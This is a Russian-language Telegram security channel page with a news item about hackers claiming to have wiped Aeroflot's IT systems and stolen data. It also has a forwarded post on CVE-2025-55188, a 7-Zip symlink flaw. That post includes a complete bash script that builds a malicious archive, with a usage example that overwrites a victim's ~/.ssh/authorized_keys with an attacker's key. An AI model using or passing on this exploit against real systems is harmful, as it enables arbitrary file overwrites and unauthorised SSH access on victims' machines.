Путь до хакера | Cyber security
1.05K subscribers
75 photos
2 videos
17 files
140 links
Блог об информационной безопасности 👾

Всё, что тебе нужно, здесь: https://github.com/artroneee/Cyber-Security-Collection

По всем вопросам:
@artrone
@cherepawwka
Download Telegram
⚡️⚡️Хакеры взломали «Аэрофлот» — хакерская группировка заявила о полном уничтожении внутренней ИТ-инфраструктуры авиакомпании. По заявлению хакеров, они находились внутри корпоративной сети больше года — выгружали историю перелётов и готовили диверсию. По их данным, уничтожено порядка 7000 физических и виртуальных серверов, получено более 20 Тб данных, включая корпоративную почту и внутренние документы. Ущерб от атаки может исчисляться десятками миллионов долларов.
Атака названа «стратегическим ударом» по цифровой безопасности компании и государственных структур. Тем временем «Аэрофлот» массово отменяет и переносит рейсы сразу в нескольких регионах, объясняя это «сбоем информационных систем». @ecotopor
🙏11
Что думаете по этому поводу?
🤬41
Forwarded from Proxy Bar
CVE-2025-55188
7z-exploit
Symlink Arbitrary File
7-Zip до 25.01.
Уязвимость возникает из-за того, что 7-Zip неправильно обрабатывает сим линки во время извлечения, что позволяет созданному архиву перезаписывать файлы в системе.
#!/bin/bash
if [ "$#" -ne 3 ]; then
echo "Usage: $0 <payload_file> <target_symlink_path> <output_archive>"
echo "Example: $0 mykey.pub ../../.ssh/authorized_keys exploit.7z"
exit 1
fi

PAYLOAD="$1"
TARGET="$2"
OUT="$3"

WORKDIR=$(mktemp -d)
ln -s "$TARGET" "$WORKDIR/symlink"
cp "$PAYLOAD" "$WORKDIR/symlink"

tar --sort=name -cf "$WORKDIR/exploit.tar" -C "$WORKDIR" symlink
7z a "$OUT" "$WORKDIR/exploit.tar" >/dev/null

echo "[*] Exploit archive created: $OUT"
rm -rf "$WORKDIR"
31